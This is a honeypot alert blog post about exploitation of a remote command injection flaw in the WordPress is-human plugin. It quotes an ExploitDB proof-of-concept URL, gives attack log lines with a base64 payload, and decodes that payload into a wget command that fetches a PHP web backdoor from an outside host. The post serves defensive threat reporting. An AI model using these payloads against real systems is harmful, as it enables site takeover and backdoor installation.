
[Honeypot Alert] More WordPress is_human Plugin Remote Command Injection Attack Detected

As we first noted in a previous Honeypot Alert blog post, our web honeypots have again received attempts to exploit a remote command injection vulnerability in the WordPress is-human plugin. ExploitDB lists the following data:

# Exploit Title: is-human (1.4.2 and prior) WordPress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php .
It is possible to take control of the eval() function via the 'type' parameter, when the 'action' is set to log-reset. From here we can run our own code.
In order to avoid any errors we point the $is_hum->get_* array variable into $is_hum->get_ih and to close the execution without error we point it to php stored function error_log(). In between we may place our own php code and use the passthru() function to execute commands.
Execution running the linux whoami command:
http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

Here are the attacks we picked up:

178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
178.137.167.112 - - [12/Mar/2012:11:14:42 +0000] "GET //wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 301 765 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

As you can see, the attacker is injecting PHP eval() and base64_decode() calls into the vulnerable "type" parameter of the is-human WordPress plugin. Decoding the base64 argument yields the following PHP:

passthru('wget http://troll.hr00.ru/sh.txt; mv sh.txt sh.php');

This attempts to use the operating system's wget HTTP client to download the "sh.txt" file from the remote site and then rename it to "sh.php" so the web server will execute it as PHP. Here is a snippet of the code:


When this code is executed by PHP, it produces a common web backdoor page such as the one in the following screenshot, which was taken from Google search results for other compromised hosts.

[Screenshot: web backdoor page as seen in Google search results (Screen shot 2012-03-12 at 12.05.06 PM)]
